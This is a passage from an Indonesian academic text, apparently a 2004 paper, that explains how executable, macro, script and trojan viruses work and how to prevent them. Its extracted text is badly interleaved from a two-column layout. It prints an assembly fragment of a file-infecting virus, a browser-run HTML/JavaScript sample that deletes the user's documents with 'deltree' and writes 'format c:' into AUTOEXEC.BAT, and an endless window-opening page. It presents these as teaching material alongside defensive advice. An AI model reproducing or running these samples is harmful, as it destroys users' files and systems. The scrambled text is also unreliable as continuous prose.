infeksi, dapat terlaksana. Langkah langkah yang
tentunya tidak mengandung ID dari virus yang
biasa dilakukan adalah :
bersangkutan.
Kemampuan
ini
mencegah
oleh
semua
jenis
virus
agar
semua
Program asli/virus disimpan dalam bentuk kode
penyusupan yang berkali-kali pada suatu fileyang
mesin dan digabung dengan program lain yang
sama.
dianggap berguna oleh pemakai.
3.6.3.
Replikasi
Program virus diletakkan pada Boot Record
atau
track
yang
komputer itu sendiri.
jarang
diperhatikan
oleh
35
Program virus dibuat sependek mungkin, dan
kita mengeksekusi file yang tertular virus
hasil
tersebut.
file
yang
diinfeksi
tidak
berubah
ukurannya.
-
Apabila virus bersifat menumpangi file maka
Virus tidak mengubah keterangan waktu suatu
virus akan merusak file asli sehingga tidak
file.
dapat berfungsi normal, tetapi apabila virus
dll.
mengadakan rutin manipulasi maka virus akan
diletakkan diakhir file sehingga tidak merusak
Yakni kemampuan untuk menyembunyikan
file.
dirinya dari perhatian user, antara lain dengan caracara berikut :
-
a. Menghadang keluaran ke layar selama virus
Biasanya virus mengadakan manipulasi dengan
vektor interupsi dengan membelokkan vektor
bekerja, sehingga pekerjaan virus tak tampak
interupsi
maka
oleh user.
interupsi
tertentu
b. Program virus ditempatkan diluar track2 yang
setiap
yang
terjadi
pemanggilan
dijalankan
terlebih
dahulu adalah program virus tersebut.
dibuat DOS (misalkan track 41).
c.
Ukuran virus dibuat sekecil mungkin sehingga
Berikut ini adalah contoh sebagian dari isi virus
tidak menarik kecurigaan.
yang dibuat dalam bahasa assembly :
3.7. Virus Executable
3.7.1.
Cara Kerja Umum
Seperti
telah
executableadalah
diketahui
virus
yang
bahwa
dibuat
virus
dengan
compiler dan bahasa pemrograman. Berikut ini
beberapa cara kerja virus :
-
File executable yang terkena virus apabila
dieksekusi akan masuk ke dalam memori dan
kemudian
akan
menginfeksi
seluruh
file
exectuble di directory aktif, atau virus akan
menginfeksi file executable lain apabila file lain
tersebut dieksekusi.
-
Virus yang aktif akan masuk kedalam boot
sector media penyimpanan, kemudian apabila
komputer melakukan proses booting dengan
media penyimpanan tersebut maka virus akan
aktif.
-
Untuk virus resident instruksi manipulasi akan
;-- cek exe/sudah kena
mov ax,word ptr Buf
cmp ax,4D5Ah
jz Usai2
cmp ax,5A4Dh
jz Usai2
cmp byte ptr Buf+3,'W'6
jz Usai2
Tular:
;-- ke ujung file
mov ax,4202h
xor cx,cx
cwd
int 21h
jc Usai2
or dx,dx
jnz Usai2
sub ax,3
push ax
;-- tulis
mov ah,40h
mov cx,offset Batas-100h
mov dx,offset Mulai
int 21h
jc Usai2
pop Lom
mov ax,4200h
xor cx,cx
diletakkan di memori, lalu virus ini akan
menunggu kesempatan untuk mengaktifkan
bagian virus yang bersifat merusak. Biasanya
virus jenis ini hanya akan aktif kembali apabila
Setelah
diperhatikan
ternyata
virus
ini
bertujuan untuk menginfeksi file COM, virus juga
menyediakan tempat sebanyak 244 bytes sebagai
36
tempat dirinya berada di ujung file korban. Virus ini
-
Hindari penggunaan disket-disket yang tidak
akan membelokkan vektor interupsi 21h dengan
bisa dipercaya sumbernya.
procedure yang telah diciptakan sendiri oleh virus,
Usahakan untuk tidak menggunakan disket-
selain itu virus ini juga melakukan proses enkripsi
disket yang sudah lama sebab mungkin saja
dengan operator bit XOR untuk mengacak badan
mengandung
virus yang terdapat pada file korban sehingga tidak
sembarangan menggunakan disket dari orang
mudah dilacak. Walaupun virus ini tidak berbahaya
lain yang tidak terjamin kebersihan disket dari
seperti virus CIH yang dapat menghapus BIOS
virus.
virus,
dan
juga
jangan
(Basic Input Output System) tetapi virus ini cukup
merugikan karena dapat merusak file.
-
Melakukan Write Protect
Dengan selalu mengunci Write Protect disket
3.7.2.
Penanggulangannya
maka,
Menghindari virus memang langkah awal
kemungkinan penularan virus sebab virus tidak
yang harus diambil sebelum komputer benar-benar
bisa menulis pada disket yang telah di-Write
terserang virus, karena lebih baik mencegah dari
Protect.
kita
dapat
lebih
meminimalkan
pada mengobati. Berikut ini cara-cara menghindari
virus yang cukup efisien :
-
-
Membuat
sub-directory
untuk
program-
Ubah program-program atribut menjadi Read
program baru.
Only
Hal ini bisa melokalisir beberapa virus apabila
Sebenarnya cara ini kurang menjamin sebab
program kita terjangkit virus.
sudah ada virus yang bisa mengubah attribut
Cara membuat sub-directory : MD [drive:]path
file. Tetapi cara ini lebih baik dilakukan dari
Cara berpindahsub-directory : CD [drive:]path
pada tidak sama sekali. Parameter untuk
merubah attribut file :
-
Scan virus setiap disket yang tidak pasti
ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H]
kebersihannya dari virus.
[[drive:][path]filename] [/S]
Apabila kita terpaksa untuk
Keterangan :
disket yang tidak diketahui kebersihannya,
+ : menambahkan attribut
maka sebaiknya kita melakukan pemeriksaan
- : menghilangkan attribut
terlebih dahulu dengan antivirus. Contoh-contoh
R : attribut hanya baca (Read only)
program antivirus yang cukup terkenal adalah
A : attribut file archive
McAfee VirusScan, Antiviral Toolkit Pro, dan
S : attribut file aystem
Norton Antivirus
menggunakan
H : attribut file tersembunyi
Path : nama cabang (sub-directory)
-
Melakukan scan virus secara periodik pada
Filename: nama file yang akan diproses
hard disk.
/S : melakukan proses diseluruh directory dan
Walaupun
sub-directory
kemungkinan dari penyebaran virus, tetapi ada
kita
telah
menjaga
segala
baiknya dilakukan pemeriksaan pada hard disk,
37
sebab mungkin saja terdapat virus baru atau
instruksi-instruksi untuk menyebar virus maupun
variasi virus yang belum bisa terdeteksi.
melakukan manipulasi lainnya.
Biasanya virus akan menulari/memodifikasi
-
Menginstal program resident pada komputer.
file NORMAL.DOT yang memang ada pada setiap
Untuk mencegah dan mendeteksi kerja virus
komputer yang menggunakan Microsoft Word,
kita bisa menggunakan program antivirus yang
sebab file tersebut adalah file yang dijadikan
sifatnya
resident,
residen
adalah
yang
dimaksud
dengan
standar awal pengetikan dan juga merupakan file
program
yang
menetap
yang pertama kali dibuka oleh Microsoft Word ketika
sementara pada memori komputer. Contoh
dieksekusi. Tetapi ada juga virus yang tidak
program residen adalah Scan McAfee Vshield
melakukan manipulasi pada file ini tetapi membuat
dan Norton Anti Virus.
file DOT baru yang mengandung virus dan merubah
program Microsoft Word untuk menggantikan file
-
Menggunakan
program
anti
virus
yang
terbaru
NORMAL.DOT itu dengan file buatan virus. Sebagai
contoh virus Melissa yang sangat terkenal itu
ingin
merupakan virus macro Microsoft Word yang media
memperkecil kemungkinan penularan virus, kita
penyebarannya dapat melalui internet, mengirim
harus selalu mengikuti perkembangan program
dirinya sendiri lewat e-mail sebagai attachment.
Memang
seharusnya
apabila
kita
anti virus sebab dengan semakin banyaknya
virus-virus baru yang belum bisa terdeteksi oleh
3.8.2.
antivirus yang lama, sehingga para pencipta
-
Penanggulangannya
Ubah
atribut
seluruh
document
template
program anti virus juga membuat program anti
terutama file NORMAL.DOT menjadi read-only.
virus yang lebih baru pula.
Dengan demikian untuk virusvirus sederhana
tidak akan mampu untuk menulari komputer
-
Periksa secara rutin registry Windows di bagian
sebab virus tidak dapat menulis apapun pada
\HKEY_CURRENT_USER\Software\Microsoft\
file NORMAL.DOT, tetapi ada juga virus yang
Windows\CurrentVersion\Run,
tidak terpengaruh oleh tindakan pencegahan ini.
apakah
menemukan sesuatu yang mencurigakan jika
menemukan
itu
hapus
bagian
yang
-
Apabila kita tidak
memiliki antivirus
yang
memadai dan Microsoft Word telah terkena
mencurigakan itu.
virus,
hapus
file
NORMAL.DOT
sebab
3.8. Virus Macro
umumnya
3.8.1.
NORMAL.DOT kembali dengan tanpa virus.
Cara Kerja Umum
program
akan
membuat
file
Cara kerja virus Macro yang akan dibahas
adalah virus Microsoft Word. Virus akan menginfeksi
file
Microsoft
(Document
Word
Template)
dengan
dan
ekstension
DOC
-
DOT
Periksa
setiap
file
dengan
menggunakan
program antivirus (usahakan yang terbaru)
(Document),
sebelum kita menggunakannya.
dimana apabila kita menggunakan Microsoft Word
untuk memanggil file-file tersebut maka macro dari
virus akan dijalankan, didalam macro inilah terdapat
-
Apabila program antivirus tidak dapat mengatasi
atau mendeteksinya, file document kita buka
38
dengan
(program
menggunakan
pengetikan
program
paket
Wordpad
pada
setiap
Microsoft Windows ) lalu file dikonversi menjadi
file RTF (Rich Text File), baru kemudian file
RTF itu kita buka dengan Microsoft Word dan
bila perlu kita konversi lagi menjadi document.
Apabila Wordpad tidak dapat membuka file
tersebut, bisa kita gunakan program pengetikan
lainnya sebagai pengganti seperti Corel Word
Perfect ataupun Adobe Type Manager.
3.9. Virus Script
3.9.1.
komputer, tetapi berikut ini adalah isi dari file HTML
yang mempunyai dampak lebih parah :
<html><body>
<object id="wss"
classid="clsid:F935DC22-1CF0-11D0-ADB900C04FD58A0B"></object>
<object id="sfso"
classid="clsid:0D43FE01-F093-11CF-894000A0C9054228"></object>
<script language="JavaScript">
wss.Run('deltree /y c:\mydocu~1');
sfso.CreateTextFile('c:\autoexec.bat',true).WriteLine
('format
c:/u/q');
alert(‘Wait a moment.');
</script>
</body></html>
Cara Kerja Umum
Script yang digunakan untuk file diatas
Karena virus jenis ini biasanya terdapat
pada file HTML maka virus ini akan beraksi setiap
adalah
kali kita menjelajah internet
mengeksekusi program Active-X, dimana hasilnya
dengan
program
Javascript
directory
tambahan
menghapus
Program browser yang sering menjadi target adalah
kemudian merubah file AUTOEXEC.BAT komputer
Microsoft Internet Explorer dan Netscape Navigator.
menjadi berisi instruksi untuk memformat hard disk.
Berikut ini adalah isi dari file INDEX.HTML yang
Masih banyak lagi variasi dan kemungkinan suatu
berisi virus, tetapi cukup tidak berbahaya :
virus script melakukan aksinya oleh karena itu hal ini
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1;
URL=index.html">
<SCRIPT LANGUAGE="JavaScript">
<!-for (x=0;x<1;x)
open("index.html");
</SCRIPT>
</HEAD>
</body>
</HTML>
tidak boleh diremehkan begitu saja.
-
isi
dengan
internet browser yang mendukung script tersebut.
3.9.2.
seluruh
juga
c:\mydocu~1
Penanggulangannya
Tingkatkan options security dari browser
setiap kali kita merasa memasuki alamat
internet yang berbahaya.
-
Set agar setiap kali browser menemukan
suatu script agar selalu muncul pilihan apakah
File
tersebut
apabila
dijalankan
oleh
script itu ingin dijalankan atau tidak. Jadi kita
browser yang mendukung Javascript maka akan
bisa menyelidiki terlebih dahulu apakah sisi
berakibat komputer akan membuka banyak sekali
dari script tersebut berbahaya.
browser hingga tidak terhingga sampai nantinya
komputer akan mengalami hang atau crash. Sebab
instruksi
dari
Javascript
yang rawan dan memegang kendali penting
memanggil diri sendiri tanpa pernah berhenti.
seperti : AUTOEXEC.BAT; DOSSTART.BAT
Mungkin
dan sebagainya.
berakibat fatal pada
diatas
adalah
Set atribut menjadi read-only untuk file-file
untuk
contoh
diatas
-
hanyalah
tidak
akan
39
-
Ubah nama program file yang rawan dan
HKEY_CLASSES_ROOT\exefile\shell\open\comma
memegang kendali penting menjadi tidak
nd.
Untuk trojan adalah suatu program yang
standar seperti : FORMAT.EXE; DEBUG.EXE
; DELTREE.EXE dan sebagainya.
dikirimkan oleh seseorang kepada kita dimana
program tersebut merugikan bagi kita. Trojan bisa
-
Periksa secara rutin registry Windows di
berupa program perusak maupun program kendali.
bagian
Contoh trojan yang terkenal adalah Back Orifice dan
\HKEY_CURRENT_USER\Software\Microsoft
Netbus, apabila korban telah terkena salah satu dari
\Windows\CurrentVersion\Run,
apakah
program ini maka apabila korban terhubung ke
menemukan sesuatu yang mencurigakan jika
jaringan atau internet, si pengirim trojan dapat
menemukan
mengendalikan komputer korban dari jauh, bahkan
itu
hapus
bagian
yang
mencurigakan itu.
tidak mustahil untuk mematikan atau merusak dari
jauh.
-
Selalu membuat file cadangan dari registry
Windows .
3.10.2. Penanggulangannya
-
3.10.
Virus dari Internet dan Trojan
Scan
virus
setiap
file
yang
tidak
pasti
kebersihannya dari virus.
3.10.1. Cara Kerja Umum
Terutama yang berasal dari internet, harus tetap
Virus dari internet bisa membawa virus-virus
waspada walaupun kita menerima e-mail berisi
lainnya, pada dasarnya virus dari internet proses
file Microsoft Word atau executable atas nama
pembuatannya
kenalan sebab mungkin saja e-mail tersebut
hampir
sama
dengan
virus
executable dan virus macro. Yang membedakannya
merupakan perbuatan virus.
adalah cara penularannya, virus jenis ini mampu
untuk menyebar melalui media internet yaitu akan
-
mengirimkan dirinya sendiri ke
internet
setiap
kali
terjadi
Periksa secara rutin registry Windows di bagian
\HKEY_CURRENT_USER\Software\Microsoft\
hubungan
antara
Windows\CurrentVersion\Run,
apakah
komputer dengan internet. Contoh yang cukup
menemukan sesuatu yang mencurigakan jika
terkenal adalah virus Happy99 yaitu virus yang
menemukan
merubah
mencurigakan itu.
file
WINSOCK.DLL
yaitu
file
yang
itu
hapus
bagian
yang
menangani hubungan internet suatu komputer yang
berhubungan dengan socket di internet. Contoh lain
-
Set atribut file WINSOCK.DLL menjadi read-
adalah Virus Pretty+Park yang juga menyebar
only, untuk memperkecil kemungkinan virus
secara otomatis lewat e-mail dengan mengirimkan
untuk memanipulasinya.
diri sendiri sebagai attachment, ciri-cirinya tidak ada
reaksi apa-apa ketika dijalankan, tetapi meduplikat
dirinya
ke
C:\windows\system\files32.vxd
serta
menambah suatu string pada registry Windows di
lokasi
-
Catat
tanggal,
ukuran,
dari
file
yang
mencurigakan sebab akan berguna suatu saat
apabila benar file tersebut mengandung virus.
40
DAFTAR PUSTAKA
dan Praktek Aplikasi Bisnis. Andi Offset,
Yogyakarta.
Amperiyanto, Tri, 2003. Bermain-main dengan Virus
Macro 2 : Menjelajah Word dan Excel. PT
Elex
Media
Komputindo,
http://securityresponse.symantec.com
Kelompok
Gramedia, Jakarta.
(Diambil
tanggal 23 Juni 2004)
http://www.nai.com (Diambil tanggal 24 Juni 2004)
http://www.vaksin.com (Diambil tanggal 25 Juni
Bishop, Matt, 2003. Computer Security : Art and
Science.
Addison-Wesley,
Pearson
2004)
http://www.balikpapan.depkeu.go.id(Diambil tanggal
Education, Inc., Boston.
24 Juni 2004)
http://echo.or.id(Diambil tanggal 24 Juni 2004)
Bustami,
Ahmad,
1999.
Cara
Mudah
Belajar
http://www.viruslist.com(Diambil tanggal 25 Juni
Internet, HomeSite dan HTML. Dinastindo,
2004)
Kane,
Jakarta.
Pamela,
1995.
Pembasmian
dan
Pengamanan Virus di Komputer Anda.
Cobb, Stephen, 1990. The Stephen Cobb Complete
Dinastindo, Jakarta.
Book of PC and LAN Security. Windcrest
Murugappan, Palani. Internet Simplified. Venton
Books.
Publishing.
Cohen, Frederick B., 1994. A Short CourseOon
Computer Viruses. John Wiley & Sons, Inc.
Norton, Peter and Nielsen, Paul, 1992. Inside the
Norton Antivirus. Brady Publishing, New
Crume, Jeff, 2000. Inside Internet Security : What
Hackers
Dont’t
Addison-Wesley,
Want
You
To
Pearson
York.
Know.
Education
Limited, London.
Sudarisman,
1991.
Pedoman
Lengkap
Komputer. PT Elex Media Komputindo,
Kelompok Gramedia, Jakarta.
Fogie, Seth and Peikari, Cyrus, 2002. Windows
Internet Security : Protecting Your Critical
Data. Prentice Hall PTR, Upper Saddle
River, New Jersey.
Frost, David, Beale,
Ian and Frost, Chris, 1989.
Pedoman Lengkap Virus Komputer. PT.
Elex Media Komputindo, Jakarta.
Hartono, Jogiyanto, 2001. Analisis & Desain Sistem
Informasi : Pendekatan Terstruktur Teori
Virus